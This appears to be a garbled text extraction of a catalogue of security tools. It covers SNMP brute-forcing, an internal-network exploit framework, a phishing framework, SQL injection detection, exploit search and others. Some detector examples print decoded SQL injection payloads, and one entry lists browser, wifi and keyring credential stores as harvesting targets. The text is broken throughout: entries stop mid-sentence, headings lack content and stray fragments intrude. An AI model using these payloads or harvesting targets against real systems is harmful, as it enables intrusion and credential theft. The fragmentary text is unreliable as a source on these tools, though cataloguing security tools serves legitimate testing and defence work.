CN/tree/etc/syslog.conf
http://cmip-pcmdi.llnl.gov/cmip5/docs/esg.ini
https://security.fnal.gov/krb5.conf
http://collaborate2.nws.noaa.gov/canned_data/data_files/
pqact.conf
[+] Done!
DownloadSnitch
SNMP BRUTE - FAST SNMP BRUTE FORCE,
ENUMERATION, CISCO CONFIG DOWNLOADER AND
PASSWORD CRACKING SCRIPT
SNMP brute force, enumeration, CISCO config downloader and
password cracking script. Listens for any responses to the
brute force community strings, effectively minimising wait time.
Requirements
metasploit
snmpwalk
snmpstat
john the ripper
Usage
Options
--target=IP, -t IP Host IP
--port=PORT, -p PORT SNMP port
Advanced
Automation
Operating Systems
Alternative Options
Features
DownloadSNMP Brute
SOCAT - MULTIPURPOSE RELAY (SOCKET CAT)
Socatis autility similar to the venerable Netcat that works over
a number of protocols and through a files, pipes, devices
(terminal or modem, etc.), sockets (Unix, IP4, IP6 - raw, UDP,
TCP), a client for SOCKS4, proxy CONNECT, or SSL, etc. It
provides forking, logging, and dumping, different modes for
interprocess communication, and many more options. It can be
used, for example, as a TCP relay (one-shot or daemon), as a
daemon-based socksifier, as a shell interface to Unix sockets,
as an IP6 relay, for redirecting TCP-oriented programs to a
serial line, or to establish a relatively secure environment (su
and chroot) for running client or server shell scripts with
network connections.
Socat is a command line based utility that establishes two
bidirectional byte streams and transfers data between them.
Because the streams can be constructed from a large set of
different types of data sinks and sources (see address types),
and because lots of address options may be applied to the
streams, socat can be used for many different purposes.
Filan is a utility that prints information about its active file
descriptors to stdout. It has been written for debugging socat,
but might be useful for other purposes too. Use the -h option to
find more infos.
specifications.
-V
Like -h, plus a list of the short names of all available address
options. Some options are platform dependend, so this output
is helpful for checking the particular implementation.
-hhh | -???
Writes the transferred data not only to their target streams, but
also to stderr. The output format is text with some conversions
for readability, and prefixed with "> " or "< " indicating flow
directions.
-x
Writes the transferred data not only to their target streams, but
also to stderr. The output format is hexadecimal, prefixed with
"> " or "< " indicating flow directions. Can be combined with -v .
-b<size>
When one channel has reached EOF, the write part of the other
channel is shut down. Then, socat waits <timeout> [timeval]
seconds before terminating. Default is 0.5 seconds. This
timeout only applies to addresses where write and read part
can be closed independently. When during the timeout interval
the read part gives EOF, socat terminates without awaiting the
timeout.
-T<timeout>
Download Socat
SOFTAVIR - ANTIVIRUS FOR WINDOWS BASED ON
WHITELISTS
DownloadSoftavir
SONAR.JS - FRAMEWORK FOR IDENTIFYING AND
LAUNCHING EXPLOITS AGAINST INTERNAL NETWORK
HOSTS
A framework for identifying and launching exploits against
internal network hosts. Works via WebRTC IP enumeration,
WebSocket host scanning, and external resource fingerprinting.
Fingerprints
'fingerprints': ["/images/New_ui/
asustitle.png","/images/loading.gif","/images/
alertImg.png","/images/New_ui/networkmap/line_one.png","/
images/New_ui/networkmap/lock.png","/images/New_ui/
networkmap/line_two.png","/index_style.css","/
form_style.css","/NM_style.css","/other.css"],
'callback': function( ip ) {
// Insert exploit here
},
},
{
'name': "Linksys WRT54G",
'fingerprints': ["/UILinksys.gif","/UI_10.gif","/
UI_07.gif","/UI_06.gif","/UI_03.gif","/UI_02.gif","/
UI_Cisco.gif","/style.css"],
'callback': function( ip ) {
// Insert exploit here
},
},
]
DownloadSonar.js
SPARKYLINUX - LIGHTWEIGHT & FAST DEBIAN-BASED
LINUX DISTRIBUTION
Why Sparky?
Download SparkyLinux
SPARTA - NETWORK INFRASTRUCTURE PENETRATION
TESTING TOOL
Download SPARTA
SPEEDTEST - COMMAND LINE INTERFACE FOR TESTING
INTERNET BANDWIDTH
pip / easy_install
or
easy_install speedtest-cli
Github
pip install git+https://github.com/sivel/speedtestcli.git
or
git clone https://github.com/sivel/speedtest-cli.git
python speedtest-cli/setup.py install
or
curl -Lo speedtest-cli https://raw.githubusercontent.com/
sivel/speedtest-cli/master/speedtest_cli.py
chmod +x speedtest-cli
Usage
$ speedtest-cli -h
usage: speedtest-cli [-h] [--bytes] [--share] [--simple]
[--list]
[--server SERVER] [--mini MINI] [-source SOURCE]
[--timeout TIMEOUT] [--version]
Command line interface for testing internet bandwidth
using speedtest.net.
---------------------------------------------------------
----------------https://github.com/sivel/speedtest-cli
optional arguments:
-h, --help
--bytes
speedtest.net share
results image
--simple
basic information
--list
servers sorted by
distance
--server SERVER
--mini MINI
--source SOURCE
--timeout TIMEOUT
--version
Download Speedtest
SPF - SPEEDPHISH FRAMEWORK
Requirements:
dnspython
twisted
PhantomJS
Usage:
usage: spf.py [-h] [-f <list.txt>] [-C <config.txt>] [-all] [--test] [-e]
[-g] [-s] [--simulate] [-w] [-W] [-d
<domain>]
[-c <company's name>] [--ip <IP address>]
[-v] [-y]
optional arguments:
-h, --help
-d <domain>
-c <company's name>
IP of webserver defaults to
[192.168.1.124]
-v, --verbosity
input files:
-f <list.txt>
addresses
-C <config.txt>
config file
enable flags:
--all
-s -w)
--test
emails... same as
-g
email targets
-s
emails to targets
-w
sites
-W
termination of spf.py
misc:
-y
questions
Execution:
cd spf
python spf.py --test -d example.com
Misc
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
Data Sources
Location
Notes
abuse.c
h
http://www.abuse.ch
Various malware
trackers.
AdBlock
https://easylistdownloads.adblockplus.or
g/easylist.txt
AdBlock pattern
matches
AlienVa
ult
https://
reputation.alienvault.com
AlienVaults IP
reputation
database.
Autoshu
n.org
http://www.autoshun.org
Blacklists.
AVG
Site
Safety
Report
http://
www.avgthreatlabas.com
Site safety
checker.
Bing
http://www.bing.com
Scraping but
future version to
also use API.
Blocklist
.de
http://lists.blocklist.de
Blacklists.
Checku
sernam
es.com
http://
www.checkusernames.co
m
Look up
username
availability on
popular sites.
DNS
Defaults to your
local DNS but can
be configured to
whatever IP
address you
supply
SpiderFoot.
Domain
Tools
http://
www.domaintools.com
DroneB
L
http://www.dronebl.org
DuckDu
ckGo
http://
www.duckduckgo.com
Facebo
ok
http://www.facebook.com
Scraping but
future version to
also use API.
FreeGe
oIP
http://freegeoip.net
Github
http://www.github.com
http://www.google.com
Scraping but
future version to
also use API.
Google
+
http://plus.google.com
Scraping but
future version to
also use API.
Google
Safe
Browsin
g
http://www.google.com/
safebrowsing
Site safety
checker.
IPCat
https://
raw.githubusercontent.co
m/client9/ipcat/master/
datacenters.csv
IP Categorisation.
LinkedI
n
http://www.linkedin.com
Scraping but
future version to
also use API.
malc0d
e.com
http://malc0de.com
Blacklists.
malwar
edomai
nlist.co
m
http://
www.malwaredomainlist.c
om
Blacklists.
malwar
edomai
ns.com
http://
www.malwaredomains.co
m
Blacklists.
McAfee
SiteAdvi
sor
http://
www.siteadvisor.com
Site safety
checker.
NameDr
oppers
http://
www.namedroppers.org
Notepa
d.cc
http://www.notepad.cc
Nothink.
org
http://www.nothink.org
Blacklists.
Onion.C
ity
http://onion.city
OpenBL
http://www.openbl.org
Blacklists.
PasteBi
n
http://www.pastebin.com
Achieved through
Google scraping.
Pastie
http://www.pastie.org
PGP
Servers
http://pgp.mit.edu/pks/
PhishTa
nk
http://www.phishtank.org
Identified phishing
sites.
Project
Honeyp
ot
http://
www.projecthoneypot.org
Blacklists. API
key needed.
PunkSP
IDER
http://www.punkspider.org
RIPE/
ARIN
http://stat.ripe.net/
Robtex
http://www.robtex.com
SANS
ISC
http://isc.sans.edu
Internet Storm
Center IP
reputation
database.
SHODA
N
http://www.shodanhq.com
SORBS
http://www.sorbs.net
Blacklists.
SpamH
aus
http://www.spamhaus.org
Blacklists.
ThreatE
xpert
http://
www.threatexpert.com
Blacklists.
TOR
Node
List
http://
torstatus.blutmagie.de
TotalHa
sh.com
http://www.totalhash.com
Domains/IPs
used by malware.
UCEPR
OTECT
http://www.uceprotect.net
Blacklists.
VirusTot
al
http://www.virustotal.com
Domains/IPs
used by malware.
API key needed.
WayBac
k
Machin
e
http://www.archive.org
Whois
Various
XSSpos
ed
http://www.xssposed.org
Yahoo
http://www.yahoo.com
Scraping but
future version to
also use API.
Zone-H
http://www.zone-h.org
INSTALLATION
The Basics
DownloadSptoolkit Rebirth
SQLASSIE - EFFECTIVE DATABASE SECURITY
DownloadSQLassie
SQLCHOP - SQL INJECTION DETECTION ENGINE
http://sqlchop.chaitin.com/doc.html
Dependencies
Build
Enjoy!
classify
Given a web application input, classify API will decode the
input and find possible SQL injection payload inside. If SQLi
payload found, payloads will be listed.
Parameter 1: object with following keys
1. urlpath: string, the urlpath of web request
2. body: string, the http body of POST/PUT request
3. cookie: string, the cookie content of web request
4. raw: string, other general field that needs general
decoding.
Parameter 2: detail, if detail is True, detailed payload list
will be returned, if False, only result will be returned,
which runs faster.
Return: an object contains result and payloads
1. result: int, positive value indicates the web request
contains sql injection payload
2. payloads: list of objects containing key, score, value
and source
key: string, reserved
source: string, shows where this payload is
embed in original web request and how the
payload is decoded
Examples here:
>>> from sqlchop import SQLChop
>>> detector = SQLChop()
>>> detector.classify({'urlpath': '/tag/sr/news.asp?
d=LTElMjBhbmQlMjAxPTIlMjB1bmlvbiUyMHNlbGVjdCUyMDEsMiwzLGN
ocigxMDYpLDUsNiw3LDgsOSwxMCwxMSwxMiUyMGZyb20lMjBhZG1pbg==
' }, True)
>>>
{
'payloads': [{
'key': '',
'score': 4.070000171661377,
'source': 'urlpath: querystring_decode b64decode
url_decode ',
'value': '-1 and 1=2 union select 1,2,3,chr(106),
5,6,7,8,9,10,11,12 from admin'
}],
'result': 1
}
>>> detector.classify({'body':
'opt=saveedit&arrs1[]=83&arrs1[]=69&arrs1[]=76&arrs1[]=69
&arrs1[]=67&arrs1[]=84&arrs1[]=32&arrs1[]=42&arrs1[]=32&a
rrs1[]=70&arrs1[]=114&arrs1[]=111&arrs1[]=109&arrs1[]=32&
arrs1[]=84&arrs1[]=97&arrs1[]=98&arrs1[]=108&arrs1[]=101&
arrs1[]=32&arrs1[]=87&arrs1[]=72&arrs1[]=69&arrs1[]=82&ar
rs1[]=69&arrs1[]=32&arrs1[]=78&arrs1[]=97&arrs1[]=109&arr
s1[]=101&arrs1[]=61&arrs1[]=39&arrs1[]=83&arrs1[]=81&arrs
1[]=76&arrs1[]=32&arrs1[]=105&arrs1[]=110&arrs1[]=106&arr
s1[]=101&arrs1[]=99&arrs1[]=116&arrs1[]=39&arrs1[]=32&arr
s1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&arrs1[]=80&arr
s1[]=97&arrs1[]=115&arrs1[]=115&arrs1[]=119&arrs1[]=111&a
rrs1[]=114&arrs1[]=100&arrs1[]=61&arrs1[]=39&arrs1[]=39&a
rrs1[]=32&arrs1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&a
rrs1[]=67&arrs1[]=111&arrs1[]=114&arrs1[]=112&arrs1[]=61&
arrs1[]=39&arrs1[]=39&arrs1[]=32&arrs1[]=111&arrs1[]=114&
arrs1[]=32&arrs1[]=49&arrs1[]=61&arrs1[]=40&arrs1[]=83&ar
rs1[]=69&arrs1[]=76&arrs1[]=69&arrs1[]=67&arrs1[]=84&arrs
1[]=32&arrs1[]=64&arrs1[]=64&arrs1[]=86&arrs1[]=69&arrs1[
]=82&arrs1[]=83&arrs1[]=73&arrs1[]=79&arrs1[]=78&arrs1[]=
41&arrs1[]=45&arrs1[]=45&arrs1[]=32&arrs1[]=39'}, True)
>>>
{
'payloads': [{
'key': '',
'score': 3.9800000190734863,
'source': 'body: querystring_decode ',
'value': "SELECT * From Table WHERE Name='SQL
inject' and Password='' and Corp='' or 1=(SELECT
@@VERSION)-- '"
}, {
'key': '',
'score': 2.0899999141693115,
'source': 'body: querystring_decode ',
'value': "'SQL inject' and Password"
}, {
'key': '',
'score': 2.180000066757202,
'source': 'body: querystring_decode ',
Customization
The is_sqli API (in sqlchop.py) detects SQLi using score 2.1
as threshold, you can adjust this threshold according to your
usage scenario.
def is_sqli(self, payload):
ret = self.score_sqli(payload)
return ret > 2.1
this threshold
def classify(self, request, detail=False):
...
DownloadSQLChop
SQLIPY - PLUGIN FOR BURP SUITE THAT INTEGRATES
SQLMAP USING THE SQLMAP API
Or, you can use the SQLMap API tab to select the IP/Port on
which to run, as well as the path to python and sqlmapapi.py on
your system.
Once the SQLMap API is running, it is just a matter of right
mouse clicking in the 'Request' sub tab of either the Target or
Proxy main tabs and choosing 'SQLiPy Scan'.
This will populate the SQLMap Scanner tab of the plugin with
information about that request. Clicking the 'Start Scan' button
will execute a scan.
If the page is vulnerable to SQL injection, then a thread from
the plugin will poll the results and add them to the Scanner
Results tab.
Read more here.
DownloadSQLiPy
SQLMAP-WEB-GUI - WEB GUI TO DRIVE NEAR FULL
FUNCTIONALITY OF SQLMAP
An error occurred.
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
Requirements:
DownloadSQLMAP-Web-GUI
SQUERT - A SIMPLE QUERY AND REPORT TOOL
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
Requirements
Download Squert
SUBBRUTE - SUBDOMAIN BRUTEFORCER
SubBrute is a community driven project with the goal of
creating the fastest, and most accurate subdomain
enumeration tool. Some of the magic behind SubBrute is that it
uses open resolvers as a kind of proxy to circumvent DNS ratelimiting (https://www.us-cert.gov/ncas/alerts/TA13-088A). This
design also provides a layer of anonymity, as SubBrute does
not send traffic directly to the target's name servers.
Whats new in v1.1?
manually:
http://www.dnspython.org/
Easy to use:
./subbrute.py google.com
Tests multiple domains:
./subbrute.py google.com gmail.com blogger.com
or a newline delimited list of domains:
./subbrute.py -t list.txt
Also keep in mind that subdomains can have subdomains
(example: _xmpp-server._tcp.gmail.com):
./subbrute.py gmail.com > gmail.out
./subbrute.py -t gmail.out
Download SubBrute
SUBDOMAIN ANALYZER - GET DETAILED INFORMATION
OF A DOMAIN
Requirements:
Linux Installation:
1. sudo apt-get install python-dev python-pip
2. sudo pip install -r requirements.txt
3. easy_install prettytable
MacOSx Installation:
1. Install Xcode Command Line Tools (AppStore)
2. sudo easy_install pip, prettytable
3. sudo pip install -r requirements.txt
Windows Installation:
1. Install dnspython
2. Install gevent
3. Install prettytable
4. Open Command Prompt(cmd) as Administrator -> Goto
python folder -> Scripts (cd c:\Python27\Scripts)
5. pip install -r (Full Path To requirements.txt)
6. easy_install prettytable
DownloadSubDomain Analyzer
SUMO - SOFTWARE UPDATE MONITOR
DownloadSUMo
SYSMON V2.0 - SYSTEM ACTIVITY MONITOR FOR
WINDOWS
Usage:
Install: Sysmon.exe -i <configfile>
[-h <[sha1|md5|sha256|imphash|*],...>] [-n (<process,...>)]
[-l (<process,...>)]
Configure: Sysmon.exe -c <configfile>
[--|[-h <[sha1|md5|sha256|imphash|*],...>] [-n
(<process,...>)]
[-l (<process,...>)]]
Uninstall: Sysmon.exe -u
c
sysmon -accepteula i
Install with md5 and sha256 hashing of process created and
monitoring network connections
sysmon -accepteula i h md5,sha256 n
Install Sysmon with a configuration file (as described below)
sysmon accepteula i c:\windows\config.xml
Uninstall
sysmon u
Dump the current configuration
sysmon c
Change the configuration to use all hashes, no network
monitoring and monitoring of DLLs in Lsass
sysmon c h * l lsass.exe
Change the configuration of sysmon with a configuration file (as
described below)
sysmon c c:\windows\config.xml
Change the configuration to default settings
sysmon c --
DownloadSysmon v2.0
TAILS 1.3 - THE AMNESIC INCOGNITO LIVE SYSTEM
DownloadTails 1.3
TAILS 1.4 - THE AMNESIC INCOGNITO LIVE SYSTEM
Tor Browser 4.5 now has a security slider that you can
use to disable browser features, such as JavaScript, as a
trade-off between security and usability. The security
slider is set to low by default to provide the same level of
Tor Browser 4.5 now keeps using the same Tor circuit
while you are visiting a website. This prevents the website
from suddenly changing language, behavior, or logging
you out.
installation of fonts-linuxlibertine.
DownloadTails 1.4
TAILS 1.7 - THE AMNESIC INCOGNITO LIVE SYSTEM
NEW FEATURES
Update the Tails signing key which is now valid until 2017.
FIXED PROBLEMS
Prevent symlink attack on ~/.xsession-errors via tailsdebugging-info which could be used by the amnesia user
to bypass read permissions on any file. (#10333)
DownloadTails 1.7
TCPCRYPT - ENCRYPTING THE INTERNET
difference in your every day user experience, but yet your traffic
will be more secure and you'll have made life much harder for
hackers.
So why is now the right time to turn on encryption? Here are
some reasons:
Intercepting communications today is simpler than
ever because of wireless networks. Ask a hacker how
many e-mail passwords can be intercepted at an airport
by just using a wifi-enabled laptop. This unsophisticated
attack is in reach of many. The times when only a few elite
had the necessary skill to eavesdrop are gone.
Computers have now become fast enough to encrypt
all Internet traffic. New computers come with special
hardware crypto instructions that allow encrypted
networking speeds of 10Gbit/s. How many of us even
achieve those speeds on the Internet or would want to
download (and watch) one movie per second? Clearly, we
can encrypt fast enough.
Research advances and the lessons learnt from over
10 years of experience with the web finally enabled us
to design a protocol that can be used in today's
Internet, by today's users. Our protocol is pragmatic: it
requires no changes to applications, it works with NATs
(i.e., compatible with your DSL router), and will work even
if the other end has not yet upgraded to tcpcryptin which
case it will gracefully fall back to using the old plain-text
TCP. No user configuration is required, making it
accessible to lay usersno more obscure requests like
"Please generate a 2048-bit RSA-3 key and a certificate
request for signing by a CA". Tcpcrypt can be
incrementally deployed today, and with time the whole
Internet will become encrypted.
How Tcpcrypt works
DownloadTcpcrypt
TCPDUMP - DUMP TRAFFIC ON A NETWORK
by tcpdump);
packets ``dropped by kernel'' (this is the number of packets that
were dropped, due to a lack of buffer space, by the packet
capture mechanism in the OS on which tcpdump is running, if
the OS reports that information to applications; if not, it will be
reported as 0).
On platforms that support the SIGINFO signal, such as most
BSDs (including Mac OS X) and Digital/Tru64 UNIX, it will
report those counts when it receives a SIGINFO signal
(generated, for example, by typing your ``status'' character,
typically control-T, although on some platforms, such as Mac
OS X, the ``status'' character is not set by default, so you must
set it with stty(1) in order to use it) and will continue capturing
packets. On platforms that do not support the SIGINFO signal,
the same can be achieved by using the SIGUSR1 signal.
Reading packets from a network interface may require that you
have special privileges; see the pcap (3PCAP) man page for
details. Reading a saved packet file doesn't require special
privileges.
OPTIONS
-A
Print each packet (minus its link level header) in ASCII. Handy
for capturing web pages.
-b
Print the AS number in BGP packets in ASDOT notation rather
than ASPLAIN notation.
-B buffer_size
--buffer-size=buffer_size
Set the operating system capture buffer size to buffer_size, in
units of KiB (1024 bytes).
-c count
Exit after receiving count packets.
-C file_size
Before writing a raw packet to a savefile, check whether the file
is currently larger than file_size and, if so, close the current
savefile and open a new one. Savefiles after the first savefile
will have the name specified with the -w flag, with a number
after it, starting at 1 and continuing upward. The units of
file_sizeare millions of bytes (1,000,000 bytes, not 1,048,576
bytes).
-d
Dump the compiled packet-matching code in a human readable
form to standard output and stop.
-dd
Dump packet-matching code as a C program fragment.
-ddd
Dump packet-matching code as decimal numbers (preceded
with a count).
-D
--list-interfaces
Print the list of the network interfaces available on the system
and on which tcpdump can capture packets. For each network
interface, a number and an interface name, possibly followed
by a text description of the interface, is printed. The interface
name or the number can be supplied to the -i flag to specify an
interface on which to capture.
This can be useful on systems that don't have a command to
list them (e.g., Windows systems, or UNIX systems lacking
ifconfig -a); the number can be useful on Windows 2000 and
later systems, where the interface name is a somewhat
complex string.
The -D flag will not be supported if tcpdump was built with an
older version of libpcap that lacks the pcap_findalldevs()
function.
-e
Print the link-level header on each dump line. This can be used,
for example, to print MAC layer addresses for protocols such as
Ethernet and IEEE 802.11.
-E
Use spi@ipaddr algo:secret for decrypting IPsec ESP packets
that are addressed to addr and contain Security Parameter
Index value spi. This combination may be repeated with comma
or newline separation.
Note that setting the secret for IPv4 ESP packets is supported
at this time.
Algorithms may be des-cbc, 3des-cbc, blowfish-cbc, rc3cbc, cast128-cbc, or none. The default is des-cbc. The ability
to decrypt packets is only present if tcpdump was compiled with
cryptography enabled.
secret is the ASCII text for ESP secret key. If preceded by 0x,
then a hex value will be read.
The option assumes RFC2406 ESP, not RFC1827 ESP. The
option is only for debugging purposes, and the use of this
option with a true `secret' key is discouraged. By presenting
IPsec secret key onto command line you make it visible to
others, via ps(1) and other occasions.
In addition to the above syntax, the syntax file name may be
used to have tcpdump read the provided file in. The file is
opened upon receiving the first ESP packet, so any special
permissions that tcpdump may have been given should already
have been given up.
-f
Print `foreign' IPv4 addresses numerically rather than
symbolically (this option is intended to get around serious brain
damage in Sun's NIS server --- usually it hangs forever
translating non-local internet numbers).
The test for `foreign' IPv4 addresses is done using the IPv4
address and netmask of the interface on which capture is being
done. If that address or netmask are not available, available,
either because the interface on which capture is being done
has no address or netmask or because the capture is being
done on the Linux "any" interface, which can capture on more
than one interface, this option will not work correctly.
-F file
Use file as input for the filter expression. An additional
expression given on the command line is ignored.
-G rotate_seconds
If specified, rotates the dump file specified with the -w option
every rotate_seconds seconds. Savefiles will have the name
specified by -w which should include a time format as defined
by strftime(3). If no time format is specified, each new file will
overwrite the previous.
If used in conjunction with the -C option, filenames will take the
form of `file<count>'.
-h
--help
Print the tcpdump and libpcap version strings, print a usage
message, and exit.
--version
Print the tcpdump and libpcap version strings and exit.
-H
Attempt to detect 802.11s draft mesh headers.
-i interface
--interface=interface
Listen on interface. If unspecified, tcpdump searches the
system interface list for the lowest numbered, configured up
interface (excluding loopback), which may turn out to be, for
example, ``eth0''.
Set the time stamp type for the capture to tstamp_type. The
names to use for the time stamp types are given in pcaptstamp(7); not all the types listed there will necessarily be valid
for any given interface.
-J
--list-time-stamp-types
List the supported time stamp types for the interface and exit. If
the time stamp type cannot be set for the interface, no time
stamp types are listed.
--time-stamp-precision=tstamp_precision
When capturing, set the time stamp precision for the capture to
tstamp_precision. Note that availability of high precision time
stamps (nanoseconds) and their actual accuracy is platform
and hardware dependent. Also note that when writing captures
made with nanosecond accuracy to a savefile, the time stamps
are written with nanosecond resolution, and the file is written
with a different magic number, to indicate that the time stamps
are in seconds and nanoseconds; not all programs that read
pcap savefiles will be able to read those captures.
When reading a savefile, convert time stamps to the precision
specified by timestamp_precision, and display them with that
resolution. If the precision specified is less than the precision of
time stamps in the file, the conversion will lose precision.
The supported values for timestamp_precision are micro for
microsecond resolution and nano for nanosecond resolution.
The default is microsecond resolution.
-K
--dont-verify-checksums
Don't attempt to verify IP, TCP, or UDP checksums. This is
useful for interfaces that perform some or all of those checksum
calculation in hardware; otherwise, all outgoing TCP
checksums will be flagged as bad.
-l
Make stdout line buffered. Useful if you want to see the data
tcpdump.
-M secret
Use secret as a shared secret for validating the digests found in
TCP segments with the TCP-MD5 option (RFC 2385), if
present.
-n
Don't convert addresses (i.e., host addresses, port numbers,
etc.) to names.
-N
Don't print domain name qualification of host names. E.g., if
you give this flag then tcpdump will print ``nic'' instead of
``nic.ddn.mil''.
-#
--number
Print an optional packet number at the beginning of the line.
-O
--no-optimize
Do not run the packet-matching code optimizer. This is useful
only if you suspect a bug in the optimizer.
-p
--no-promiscuous-mode
Don't put the interface into promiscuous mode. Note that the
interface might be in promiscuous mode for some other reason;
hence, `-p' cannot be used as an abbreviation for `ether host
{local-hw-addr} or ether broadcast'.
-Q direction
--direction=direction
Choose send/receive direction direction for which packets
should be captured. Possible values are `in', `out' and `inout'.
Not available on all platforms.
-q
Quick (quiet?) output. Print less protocol information so output
-u
Print undecoded NFS handles.
-U
--packet-buffered
If the -w option is not specified, make the printed packet output
``packet-buffered''; i.e., as the description of the contents of
each packet is printed, it will be written to the standard output,
rather than, when not writing to a terminal, being written only
when the output buffer fills.
If the -w option is specified, make the saved raw packet output
``packet-buffered''; i.e., as each packet is saved, it will be
written to the output file, rather than being written only when the
output buffer fills.
The -U flag will not be supported if tcpdump was built with an
older version of libpcap that lacks the pcap_dump_flush()
function.
-v
When parsing and printing, produce (slightly more) verbose
output. For example, the time to live, identification, total length
and options in an IP packet are printed. Also enables additional
packet integrity checks such as verifying the IP and ICMP
header checksum.
When writing to a file with the -w option, report, every 10
seconds, the number of packets captured.
-vv
Even more verbose output. For example, additional fields are
printed from NFS reply packets, and SMB packets are fully
decoded.
-vvv
Even more verbose output. For example, telnet SB ... SE
options are printed in full. With -X Telnet options are printed in
hex as well.
-V file
Read a list of filenames from file. Standard input is used if file is
``-''.
-w file
Write the raw packets to file rather than parsing and printing
them out. They can later be printed with the -r option. Standard
output is used if file is ``-''.
This output will be buffered if written to a file or pipe, so a
program reading from the file or pipe may not see packets for
an arbitrary amount of time after they are received. Use the -U
flag to cause packets to be written as soon as they are
received.
The MIME type application/vnd.tcpdump.pcap has been
registered with IANA for pcap files. The filename
extension .pcap appears to be the most commonly used along
with .cap and .dmp. Tcpdump itself doesn't check the extension
when reading capture files and doesn't add an extension when
writing them (it uses magic numbers in the file header instead).
However, many operating systems and applications will use the
extension if it is present and adding one (e.g. .pcap) is
recommended.
See pcap-savefile(5) for a description of the file format.
-W
Used in conjunction with the -C option, this will limit the number
of files created to the specified number, and begin overwriting
files from the beginning, thus creating a 'rotating' buffer. In
addition, it will name the files with enough leading 0s to support
the maximum number of files, allowing them to sort correctly.
Used in conjunction with the -G option, this will limit the number
of rotated dump files that get created, exiting with status 0
when reaching the limit. If used with -C as well, the behavior
will result in cyclical files per timeslice.
-x
When parsing and printing, in addition to printing the headers of
each packet, print the data of each packet (minus its link level
header) in hex. The smaller of the entire packet or snaplen
bytes will be printed. Note that this is the entire link-layer
packet, so for link layers that pad (e.g. Ethernet), the padding
bytes will also be printed when the higher layer packet is
shorter than the required padding.
-xx
When parsing and printing, in addition to printing the headers of
each packet, print the data of each packet, including its link
level header, in hex.
-X
When parsing and printing, in addition to printing the headers of
each packet, print the data of each packet (minus its link level
header) in hex and ASCII. This is very handy for analysing new
protocols.
-XX
When parsing and printing, in addition to printing the headers of
each packet, print the data of each packet, including its link
level header, in hex and ASCII.
-y datalinktype
--linktype=datalinktype
Set the data link type to use while capturing packets to
datalinktype.
-z postrotate-command
Used in conjunction with the -C or -G options, this will make
tcpdump run " postrotate-command file " where file is the
savefile being closed after each rotation. For example,
specifying -z gzip or -z bzip2 will compress each savefile using
gzip or bzip2.
Note that tcpdump will run the command in parallel to the
capture, using the lowest priority so that this doesn't disturb the
capture process.
And in case you would like to use a command that itself takes
flags or different arguments, you can always write a shell script
that will take the savefile name as the only argument, make the
flags & arguments arrangements and execute the command
that you want.
-Z user
--relinquish-privileges=user
If tcpdump is running as root, after opening the capture device
or input savefile, but before opening any savefiles for output,
change the user ID to user and the group ID to the primary
group of user.
This behavior can also be enabled by default at compile time.
expression
selects which packets will be dumped. If no expression is given,
all packets on the net will be dumped. Otherwise, only packets
for which expression is `true' will be dumped. For the
expression syntax, see pcap-filter(7).
The expression argument can be passed to tcpdump as either
a single Shell argument, or as multiple Shell arguments,
whichever is more convenient. Generally, if the expression
contains Shell metacharacters, such as backslashes used to
escape protocol names, it is easier to pass it as a single,
quoted argument rather than to escape the Shell
metacharacters. Multiple arguments are concatenated with
spaces before being parsed.
EXAMPLES
To print all packets arriving at or departing from sundown:
tcpdump host sundown
To print traffic between helios and either hot or ace:
Download Tcpdump
TEEMIP - IP ADDRESS MANAGEMENT SOLUTION
DownloadTeemIp
TESTDISK - PARTITION RECOVERY AND FILE UNDELETE
FOR WINDOWS, LINUX AND MAC
TestDisk can find lost partitions for all of these file systems:
BeFS ( BeOS )
BSD disklabel ( FreeBSD/OpenBSD/NetBSD )
CramFS, Compressed File System
DOS/Windows FAT12, FAT16 and FAT32
XBox FATX
Windows exFAT
HFS, HFS+ and HFSX, Hierarchical File System
JFS, IBM's Journaled File System
Linux btrfs
DownloadTestDisk
THE EXPLOIT-DATABASE GIT REPOSITORY
Usage
default,
searches will try to be greedy
-v
lines
are allowed to overflow their columns
-h, --help - Show help screen
NOTES:
- Use any number of search terms you would like
(minimum: 1)
- Search terms are not case sensitive, and order is
irrelevant
root@kali:~# searchsploit afd windows local
---------------------------------------------------------------|---------------------------------Description
|
Path
| /windows/dos/17133.c
Windows XP/2003 Afd.sys - Local Privilege Escalation
Exploit (M | /windows/local/18176.py
Windows - AfdJoinLeaf Privilege Escalation (MS11-080)
| /windows/local/21844.rb
---------------------------------------------------------------|---------------------------------root@kali:~#
Supported softwares
tortoise
wifi
Wireless Network Password (Windows
mechanism)
windows credentials
Domain visible network (.Net Passport)
Generic network credentials
Linux
browsers
firefox
opera
chats
pidgin
jitsi
mails
thunderbird
adminsys
filezilla
environment variables
database
sqldeveloper
squirrel
dbvisualizer
wifi
network manager
wallet
gnome keyring
IE Browser history
For Linux
None
First check out the config/ptf.config file which contains the base
location of where to install everything. By default this will install
in the /pentest directory. Once you have that configured, move
to running PTF by typing ./ptf (or python ptf).
This will put you in a Metasploitesk type shell which has a
similar look and feel for consistency. Show modules, use , etc.
are all accepted commands. First things first, always type help
or ? to see a full list of commands.
Update EVERYTHING!
If you want to install and/or update everything, simply do the
following:
./ptf
use modules/install_update_all
run
This will install all of the tools inside of PTF. If they are already
installed, this will iterate through and update everything for you
automatically.
You can also show options to change information about the
modules.
Modules:
First, head over to the modules/ directory, inside of there are
sub directories based on the Penetration Testing Execution
Standard (PTES) phases. Go into those phases and look at the
different modules. As soon as you add a new one, for example
testing.py, it will automatically be imported next time you launch
PTF. There are a few key components when looking at a
module that must be completed.
Below is a sample module
Module Development:
All of the fields are pretty easy, on the repository locations, right
now all thats supported is GIT. The plan in the next release is
to expand to file downloader. This can still be accomplished
through after commands (explained later). Fill in the depends,
and where you want the install location to be. PTF will take
where the python file is located (for example exploitation) and
move it to what you specify in the PTF config (located under
config). By default it installs all your tools to /pentest//
Note in modules, you can specify after commands
{INSTALL_LOCATION}. This will append where you want the
install location to go when using after commands.
After Commands:
After commands are commands that you can insert after an
installation. This could be switching to a directory and kicking
off additional commands to finish the installation. For example
in the BEEF scenario, you need to run ruby install-beef
afterwards. Below is an example of after commands using the
{INSTALL_LOCATION} flag.
A F T E R _ C O M M A N D S = " c p c o n fi g / d i c t / r o c k y o u . t x t
